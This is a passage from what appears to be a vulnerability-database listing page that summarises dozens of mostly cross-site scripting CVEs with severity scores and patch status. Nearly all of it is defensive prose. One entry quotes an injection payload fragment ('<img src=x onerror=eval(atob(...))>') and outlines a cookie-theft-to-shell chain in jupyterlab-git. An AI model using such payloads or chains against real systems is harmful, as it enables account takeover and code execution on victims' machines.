{{#ev:}} or {{#evl:}} parser functions. The unsanitized service name is reflected into an error message that is rendered as raw HTML, executing in the wiki origin for every visitor to the affected page. No public exploit identified at time of analysis beyond the advisory's own PoC, but working PoC code is published in the GitHub Security Advisory GHSA-c29q-5xm7-5p62.

PHP XSS
NVD GitHub
EPSS 0% CVSS 2.1
LOW PATCH Monitor

Stored XSS in Parse Server's file upload handler enables authenticated users to bypass the `fileUpload.fileExtensions` blocklist by pairing a non-standard or compound filename extension (e.g., `malicious.svg~`, `malicious.html.bak`) with a dangerous Content-Type header such as `image/svg+xml` or `text/html`. On S3 and GCS storage adapters, which persist and serve the client-supplied Content-Type, the uploaded file is subsequently delivered to browsers with attacker-controlled content, executing arbitrary JavaScript against any victim who opens the file URL. This is the third incomplete-fix iteration of the same vulnerability class (following GHSA-vr5f-2r24-w5hc and GHSA-7wqv-xjf3-x35v), with patches confirmed in versions 8.6.81 and 9.9.1-alpha.11 and no public exploit or CISA KEV listing identified at time of analysis.

File Upload XSS
NVD GitHub VulDB
EPSS 0% CVSS 9.3
CRITICAL PATCH Act Now

Stored cross-site scripting in the jupyterlab-git extension (versions 0.30.0b3 through 0.53.x) escalates to remote code execution when a victim views a rename diff in the Git History tab. The PlainTextDiff.ts createHeader() method injects unsanitized Git filenames into innerHTML, so a filename such as <img src=x onerror=eval(atob(...))>.py fires JavaScript that reads the _xsrf cookie, spawns a JupyterLab terminal via POST /api/terminals, and runs arbitrary shell commands. Reported by AWS Security; no public exploit identified at time of analysis, though the vendor advisory (GHSA-f962-v9hr-pfg5) documents a detailed reproduction path, and it is not listed in CISA KEV.

XSS RCE
NVD GitHub VulDB
CVSS 5.1
MEDIUM PATCH This Month

Stored cross-site scripting in symfony/ux-autocomplete allows an attacker who can write user-controlled data to an AJAX autocomplete endpoint to execute arbitrary JavaScript in the browser of any user who subsequently loads a page containing an affected autocomplete widget. The Stimulus controller's `_createAutocompleteWithRemoteData()` function interpolates the `text` field from AJAX responses directly into HTML template literals without sanitization, causing the browser to parse and execute embedded markup. The vulnerability affects composer package versions 2.2.0-2.36.0 and 3.0.0-3.1.0; a vendor-released patch is available, and no active exploitation has been confirmed (not in CISA KEV).

XSS
NVD GitHub
CVSS 2.3
LOW PATCH Monitor

Cross-site scripting in symfony/ux-live-component allows network-accessible attackers to inject arbitrary HTML - including script tags - into re-rendered Live Component responses by supplying a malicious tag name via client-controlled JSON. Affected versions span composer/symfony/ux-live-component >= 2.8.0 < 2.36.0 and >= 3.0.0 < 3.1.0. Direct exploitation is constrained to applications with permissive CORS or same-origin pivot contexts; under default configuration the required Accept header provides partial protection that makes this a defense-in-depth gap rather than an immediately weaponizable internet-wide threat. No public exploit and no CISA KEV listing are confirmed at time of analysis.

XSS
NVD GitHub
EPSS 0% CVSS 5.3
MEDIUM This Month

DOM-based cross-site scripting in Microchip's GridTime 3000 GNSS Time Server allows an authenticated attacker to inject malicious JavaScript through the device's password reset form, executing arbitrary script in the browser context of any user who subsequently loads the affected page. The vulnerability spans versions 1.0r0.03 through all releases before 1.2r0.0. No public exploit code has been identified and the vulnerability is not listed in CISA KEV at time of analysis; however, the network-accessible web interface and low-privilege authentication requirement make this exploitable in typical enterprise or utility network deployments where the device's management UI is reachable.

XSS Gridtime 3000
NVD VulDB
EPSS 0% CVSS 5.1
MEDIUM This Month

Cross-site scripting in Microchip GridTime 3000 GNSS Time Server (versions 1.0r0.03 through 1.1r0.0) permits authenticated low-privilege attackers to inject and execute malicious scripts in the browser sessions of higher-privileged users via a CSRF-to-XSS attack chain. The CVSS 4.0 Threat metric E:A signals active exploitation has been reported by the vendor, elevating urgency beyond what the 5.1 base score alone implies. Despite limited per-impact ratings, compromise of the web management interface of a critical time-synchronization appliance carries downstream risk to time-dependent infrastructure.

XSS Gridtime 3000
NVD VulDB
EPSS 0% CVSS 5.6
MEDIUM PATCH This Month

Stored Cross-Site Scripting in Octopus Server allows authenticated high-privilege users to embed malicious JavaScript payloads through the artifact upload mechanism, which execute in the browsers of other users who interact with the affected artifact. The CVSS 4.0 vector (PR:H, UI:A, VC:H) confirms exploitation requires elevated access and victim interaction, with the primary impact being confidentiality - likely session token or credential theft. No public exploit code exists and the vulnerability has not been added to the CISA KEV catalog at time of analysis.

XSS Octopus Server
NVD VulDB
EPSS 0% CVSS 4.4
MEDIUM This Month

Stored Cross-Site Scripting in the Blocksy Companion WordPress plugin (all versions through 2.1.45) enables authenticated users with editor-level privileges or above to inject persistent JavaScript payloads via admin settings in the product-reviews extension, executing silently in any site visitor's browser on page load. Exploitation is gated by two mandatory deployment conditions - WordPress multisite networks or installations where unfiltered_html has been explicitly disabled - materially narrowing the real-world attack surface beyond what the network-accessible CVSS vector alone implies. No public exploit has been identified and this CVE does not appear in the CISA KEV catalog at time of analysis; an upstream patch commit (changeset 3576066) exists but the exact fixed release version is not independently confirmed from available data.

WordPress XSS Blocksy Companion
NVD VulDB
EPSS 0% CVSS 6.4
MEDIUM This Month

Server-Side Request Forgery in the Advanced Import WordPress plugin (all versions through 1.4.6) allows authenticated users holding Author-level access or higher to force the web server to issue HTTP requests to arbitrary internal or external URLs via the demo_download_and_unzip() AJAX handler. The critical design flaw is the inconsistent use of wp_remote_get() instead of WordPress's own wp_safe_remote_get() - which the plugin correctly employs elsewhere - meaning no SSRF-aware URL validation is applied to the 'demo_file' POST parameter when 'demo_file_type' is set to 'url'. No public exploit code has been identified at time of analysis, but the scope change in the CVSS vector reflects that successful exploitation escapes the WordPress application boundary and can reach internal network services, including cloud instance metadata endpoints such as AWS IMDSv1.

XSS WordPress SSRF +1
NVD
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in BetterDocs WordPress plugin (versions ≤4.5.3) allows authenticated contributors to inject persistent malicious scripts via the unescaped blockId attribute of the betterdocs/category-slate-layout Gutenberg block. The injected payload executes in the browser of any visitor who loads the compromised page, enabling session hijacking, credential theft, or admin-level privilege escalation against site operators. No public exploit identified at time of analysis, but the contributor-level authentication threshold makes this accessible on any WordPress site permitting open or shared content authorship.

WordPress XSS Betterdocs Ai Documentation Knowledge Base Docs Wikis Faq With Chatbot
NVD
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in the Creavi Appointment Booking Calendar plugin for WordPress (all versions through 1.4.4) allows authenticated attackers holding Author-level access or higher to permanently inject arbitrary JavaScript via unsanitized custom booking field labels. The malicious payload executes in the browser of any user who subsequently visits a page containing the injected booking form, enabling session hijacking, credential harvesting, or malicious redirects against site visitors and administrators alike. No confirmed active exploitation (not in CISA KEV) and no public exploit code has been identified at time of analysis, though a fix commit is available in the WordPress plugin Trac repository.

WordPress XSS Creavi Appointment Booking Calendar
NVD
EPSS 0% CVSS 9.3
CRITICAL PATCH Act Now

Stored cross-site scripting in pgAdmin 4 versions 6.0 through 9.15 allows a malicious or attacker-influenced PostgreSQL server to inject arbitrary HTML into pgAdmin's interface via ErrorResponse messages and EXPLAIN plan fields rendered through html-react-parser. Because the injection executes inside pgAdmin's own DOM, an attacker can render convincing phishing dialogs or redirect the top-level tab via iframe srcdoc, bypassing standard X-Frame-Options and frame-ancestors protections. No public exploit identified at time of analysis, but the vendor has shipped a multi-layer fix in 9.16.

PostgreSQL XSS Pgadmin 4
NVD GitHub VulDB
EPSS 0% CVSS 4.8
MEDIUM PATCH This Month

HTML injection in pgAdmin 4's Cloud Wizard (versions 6.6 through 9.15.x) allows authenticated users to embed arbitrary HTML into the tool's DOM by exploiting unescaped AWS, Azure, and Google Cloud SDK exception text propagated into JSON response fields and parsed by html-react-parser. The primary impact is self-targeted DOM manipulation - the authenticated user who submits the crafted payload is the one who sees it rendered - with escalation to cross-user exploitation requiring an additional CSRF primitive to forge a valid X-pgA-CSRFToken in a victim's browser. No public exploit code has been identified and the vulnerability is not listed in CISA KEV, consistent with its CVSS 4.0 Medium rating of 4.8.

Microsoft Google XSS +1
NVD GitHub VulDB
EPSS 0% CVSS 4.8
MEDIUM PATCH This Month

Stored cross-site scripting in Hashgraph Guardian through 3.5.0 allows an authenticated user holding the STANDARD_REGISTRY role to inject persistent JavaScript payloads into the branding configuration's companyName field via the branding API endpoint. The injected script executes in every authenticated user's browser on every page load due to unsanitized innerHTML assignments in both the BrandingService and BrandingComponent Angular classes. No public exploit has been identified at time of analysis, and the vulnerability is not listed in CISA KEV; however, the fix diff is publicly visible in GitHub PR #6190, lowering the barrier for exploit development.

XSS Guardian
NVD GitHub VulDB
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Stored XSS in Coturn's web-admin HTTPS interface (all versions prior to 4.11.0) allows a TURN-level attacker to inject persistent JavaScript that executes in an authenticated administrator's browser when they view the session list. The attack is staged via a crafted USERNAME value in a TURN Allocate request, bridging the TURN protocol surface into the web-admin UI context. In anonymous deployments (--no-auth), no TURN credentials are required for the injection phase, broadening the exposure; in authenticated deployments the attacker must hold valid TURN credentials. No public exploit has been identified and this vulnerability is not listed in CISA KEV.

XSS Coturn Red Hat +1
NVD GitHub VulDB
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Stored XSS in Grav CMS's grav-plugin-api (Admin2) allows a low-privileged editor to persist malicious JavaScript in page content via the PATCH /pages API endpoint, which then executes in any administrator's or visitor's browser when the affected page is loaded. The root cause is that the API's partial-field validation path (validateChangedFields()) ran only type and required-field checks but omitted the XSS safety gate (Validation::checkSafety()), a check the classic Admin interface correctly enforced - creating a trust-boundary bypass exclusive to the REST API path. Publicly available exploit code exists via the Fluid Attacks advisory and the vendor's own regression test suite; no active exploitation (CISA KEV) has been confirmed.

XSS Grav Plugin Api
NVD GitHub VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

DOM-based cross-site scripting in AutoGPT versions prior to 0.6.62 allows remote attackers to execute arbitrary JavaScript in an authenticated victim's browser by tricking them into clicking a crafted signup-page link whose `next` URL parameter is passed unsanitized into `router.push`. No public exploit identified at time of analysis, but the GitHub Security Advisory (GHSA-j2cp-jg5q-38wj) confirms the issue and ships a fix in 0.6.62.

XSS Autogpt
NVD GitHub VulDB
EPSS 0% CVSS 8.5
HIGH PATCH This Week

Stored cross-site scripting in Kirby CMS (getkirby/cms) lets an authenticated Panel editor inject markup that survives Dom::sanitize() and executes as JavaScript when content is rendered in the Panel or on the site frontend. The flaw affects the writer and list fields plus the Sane HTML/SVG/XML sanitization API, and versions ≤ 4.9.3 and 5.0.0-alpha.1 through 5.4.3 are vulnerable. No public exploit identified at time of analysis, and this is not in CISA KEV, but the vendor rates it high severity because a low-privileged editor can escalate to an admin session.

File Upload XSS
NVD GitHub
EPSS 0% CVSS 7.4
HIGH PATCH This Week

Cross-site scripting in Kirby CMS's Panel writer field (versions <= 4.9.3 and 5.0.0-alpha.1 through 5.4.3) lets an authenticated user inject a JavaScript-scheme URL into the link or email marks that executes in their own browser session when clicked before the content is saved. In Kirby's default configuration this is limited to self-XSS requiring social engineering, but Panel plugins that embed the <k-writer> component without sanitizing HTML before storage can be escalated to stored XSS affecting other users. There is no public exploit and it is not in CISA KEV; the vendor rates it high severity for affected sites.

XSS
NVD GitHub
EPSS 0% CVSS 9.3
CRITICAL PATCH Act Now

Stored cross-site scripting in jupyter_server's nbconvert HTTP handlers allows a malicious notebook to execute JavaScript in the Jupyter origin, leading to session token theft, full /api/* control, and kernel remote code execution. The NbconvertFileHandler and NbconvertPostHandler render notebook-authored HTML without a CSP sandbox directive, and combined with HTMLExporter's non-sanitizing default, any display_data HTML payload runs with the victim's authority. No public exploit identified at time of analysis, but the CVSS 4.0 base score is 9.3 and a vendor patch is available in v2.20.0.

XSS
NVD GitHub VulDB
EPSS 0% CVSS 4.8
MEDIUM PATCH This Month

Stored CSS injection in Grav CMS's MediaObjectTrait::style() exposes an incomplete fix: the original patch for CVE-2026-42841 (GHSA-r7fx-8g49-7hhr) explicitly denylisted 'style' in the attribute() code path but left the parallel style() method-reachable via the same Markdown ?style= image query parameter pipeline-entirely unsanitized. Any editor holding admin.pages permission can save a single Markdown image reference with an arbitrary CSS payload that persists in the CMS and renders into <img style='...'> for every subsequent viewer, including administrators and super-admins in their authenticated sessions. A deterministic proof-of-concept ships with the advisory; no active exploitation (CISA KEV) has been confirmed at time of analysis.

PHP XSS
NVD GitHub
EPSS 0% CVSS 6.8
MEDIUM PATCH This Month

Grav CMS (getgrav/grav < 1.7.53) exposes admin bcrypt password hashes, SMTP credentials, and full site configuration to any actor who can obtain a session-static admin-nonce value - via XSS, Referrer header leakage, browser history, or proxy logs - because the backup download endpoint enforces only a single URL-embedded nonce with no form-level CSRF token and no session binding. The default backup profile archives the entire GRAV_ROOT directory including user/accounts/ and user/config/ without exclusions, and the download handler Base64-encodes the absolute filesystem path in the response URL, leaking server internals. A fully functional public PoC is available; no CISA KEV listing exists at time of analysis, but downstream risk includes offline hashcat cracking followed by unauthenticated admin login with no server-side rate limiting.

CSRF Information Disclosure RCE +3
NVD GitHub VulDB
EPSS 0% CVSS 7.4
HIGH PATCH This Week

Authentication bypass in Zitadel identity platform (versions 3.0.0-3.4.11 and 4.0.0-4.15.1) allows an attacker who has obtained a victim's authorization code, refresh token, or device authorization grant to redeem it under a different OAuth client registered on the same instance, because the server fails to validate the client_id binding required by RFC 6749 §4.1.3. No public exploit identified at time of analysis; CVSS 7.4 with high attack complexity reflects the requirement that the attacker first intercept the code or token through a separate weakness such as XSS, log exposure, or referrer leakage.

Authentication Bypass Microsoft XSS
NVD GitHub
EPSS 0% CVSS 4.8
MEDIUM PATCH This Month

Stored XSS in TinaCMS rich-text rendering allows any content author with editor-level access to inject `javascript:` or `data:text/html` URLs into Slate link/image nodes, which execute in the browsers of editors and site visitors when affected content is viewed. Both `tinacms` (< 3.9.3) and `@tinacms/mdx` (< 2.1.7) are confirmed affected, with the vulnerable path covering case-variant, whitespace-padded, and control-character-obfuscated scheme bypass techniques indicating deliberate evasion of naive sanitization. No public exploit or CISA KEV listing exists; vendor-released patches are available.

XSS
NVD GitHub
EPSS 0% CVSS 5.1
MEDIUM This Month

Reflected XSS in UBB.threads 7.7.5 enables remote attackers to execute arbitrary JavaScript in a victim's browser by tricking them into clicking a crafted URL containing malicious input. The vulnerability stems from improper handling of user-supplied data in HTTP requests, with impact scoped to the victim's browser session rather than the server itself. No public exploit code or active exploitation has been identified at time of analysis; vendor contact was unsuccessful, leaving patch status unresolved.

XSS Ubb Threads
NVD
EPSS 0% CVSS 5.1
MEDIUM This Month

Stored XSS in UBB.threads 7.7.5 permits low-privileged forum members to permanently inject arbitrary JavaScript into post content and user profile fields, which then executes silently in any visitor's browser upon viewing the affected page. The vulnerability was discovered and disclosed by CERT-PL after unsuccessful vendor contact attempts, leaving remediation status unresolved. No public exploit code has been identified and no active exploitation is confirmed, but the persistent nature of the injection vector makes this a meaningful risk to forum users and administrators alike.

XSS Ubb Threads
NVD
EPSS 0% CVSS 2.1
LOW PATCH Monitor

Reflected XSS in LAN Management System (LMS) before commit 9c5651b allows network-positioned attackers to inject arbitrary JavaScript into the browsers of authenticated LMS users by crafting malicious links targeting the `dbrecover.php` and `netremap.php` modules. The `db`, `id`, and `mapto` GET parameters were directly concatenated into HTML anchor elements without sanitization, as confirmed by the upstream commit diff. No public exploit has been identified at time of analysis, exploitation is not confirmed in CISA KEV, and the CVSS 4.0 score of 2.1 reflects genuinely constrained impact due to the required victim interaction and specific attack preconditions.

PHP XSS Lms
NVD GitHub VulDB
EPSS 0% CVSS 5.9
MEDIUM This Month

Stored Cross-Site Scripting in the Bricksable for Bricks Builder WordPress plugin (versions through 1.6.83) allows a high-privileged attacker to inject persistent malicious scripts into page builder elements, which then execute in victims' browsers when affected pages are loaded. The CVSS scope change (S:C) confirms the injected payload crosses into the victim's browser security context, enabling session hijacking, credential theft, or unauthorized actions on behalf of the viewing user. No public exploit code or active exploitation (CISA KEV) has been identified at time of analysis, but the stored nature of this XSS increases persistence risk relative to reflected variants.

XSS Bricksable For Bricks Builder
NVD VulDB
EPSS 0% CVSS 5.9
MEDIUM This Month

Stored XSS in OceanWP's Ocean Product Sharing WordPress plugin (all versions through 2.2.2) allows administrator-level attackers to persist malicious JavaScript into plugin configuration or product sharing fields. When other authenticated users or site visitors load affected product pages, the injected scripts execute in their browsers, enabling session cookie theft, credential harvesting, or unauthorized UI manipulation. No public exploit code has been identified and no active exploitation is confirmed (not in CISA KEV) at time of analysis; real-world risk is constrained by the PR:H requirement.

XSS Ocean Product Sharing
NVD
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in the Slideshow Gallery LITE WordPress plugin (all versions through 1.8.5) allows authenticated attackers with Contributor-level access to persistently inject arbitrary JavaScript via the 'alwaysauto' shortcode attribute, which then executes in the browser of any user who visits the affected page. The root cause is insufficient input sanitization and output escaping on user-supplied shortcode attributes, a classic CWE-79 pattern. The scope change in the CVSS vector (S:C) reflects that the injected script runs outside the plugin's security context - in victim users' browsers - enabling session hijacking, credential theft, or admin account takeover. No public exploit or CISA KEV listing has been identified at time of analysis.

WordPress XSS Slideshow Gallery Lite
NVD
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in the Fancy Testimonials WordPress plugin (all versions ≤ 1.0, by dijitul) permits any authenticated Contributor-level user to persist arbitrary JavaScript via the 'author' attribute of the [testimonial] shortcode, which executes in every subsequent visitor's browser context. The CVSS scope change (S:C) reflects that injected scripts operate within the victim's browser session — enabling session hijacking, credential theft, or malicious redirects targeting site visitors and administrators alike. No public exploit code has been identified and no CISA KEV listing exists at time of analysis, but the attack technique is trivially reproducible given knowledge of the shortcode parameter.

WordPress XSS Fancy Testimonials
NVD VulDB
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in PowerPress Podcasting plugin by Blubrry (WordPress, versions ≤ 11.16.8) allows authenticated attackers with Author-level access to plant persistent JavaScript payloads via the 'embed' Episode Meta Field, executing in every visitor's browser on affected episode pages. The vulnerability is architecturally significant because the embed value is written through `update_post_meta()` rather than WordPress's post content pipeline, causing kses sanitization to be skipped entirely - bypassing the role-based XSS mitigations that WordPress normally enforces even for Author-role users who lack the `unfiltered_html` capability. No public exploit or CISA KEV listing has been identified at time of analysis, though the low authentication barrier (Author level) makes multi-author WordPress sites an elevated-risk target.

WordPress XSS Powerpress Podcasting Plugin By Blubrry
NVD VulDB
EPSS 0% CVSS 6.1
MEDIUM This Month

Reflected Cross-Site Scripting in the SysBasics Customize My Account for WooCommerce plugin (versions ≤ 4.3.6) enables unauthenticated attackers to inject arbitrary JavaScript via the unsanitized 'tab' parameter in the admin settings page. Exploitation is constrained by a critical precondition: the vulnerable `plugin_options_page()` function is rendered exclusively in the WordPress admin dashboard, meaning the targeted victim must hold Shop Manager-level access or higher and be socially engineered into clicking a crafted link while authenticated. No public exploit code or CISA KEV listing has been identified at time of analysis; this is a no public exploit identified at time of analysis scenario reported by Wordfence.

WordPress XSS Sysbasics Customize My Account For Woocommerce Dashboard Endpoints Avatar Menu Manager
NVD VulDB
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in the Customize My Account For WooCommerce WordPress plugin (versions up to and including 4.3.6) allows authenticated attackers with Contributor-level access to inject persistent JavaScript payloads via the 'sysbasics_user_avatar' shortcode. The flaw originates in the wcmamtx_get_avatar_default() function, which concatenates unescaped user-supplied shortcode attributes (min_height, min_width, max_height, max_width) directly into the get_avatar() extra_attr style attribute, bypassing sanitization entirely. No active exploitation is confirmed in CISA KEV and no public exploit has been identified at time of analysis, though Wordfence has published full technical details including the vulnerable source lines.

WordPress XSS Sysbasics Customize My Account For Woocommerce Dashboard Endpoints Avatar Menu Manager
NVD VulDB
EPSS 0% CVSS 7.0
HIGH This Week

Stored cross-site scripting in Cotonti 1.0.0 (master branch, commit f43f1fc3) lets an authenticated user inject HTML/JavaScript into Personal File Storage (PFS) folder titles, which then execute in any viewer's browser when the folder listing is rendered. The flaw stems from the 'TXT' import filter not encoding HTML combined with unescaped template output, and no public exploit identified at time of analysis. Discovered by TuranSec; impact extends to other users browsing public folders, enabling session theft or account actions in their context.

PHP XSS Cotonti
NVD GitHub VulDB
Prev Page 8 of 432 Next

Quick Facts

Typical Severity
MEDIUM
Category
web
Total CVEs
38827

Related CWEs

MITRE ATT&CK

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy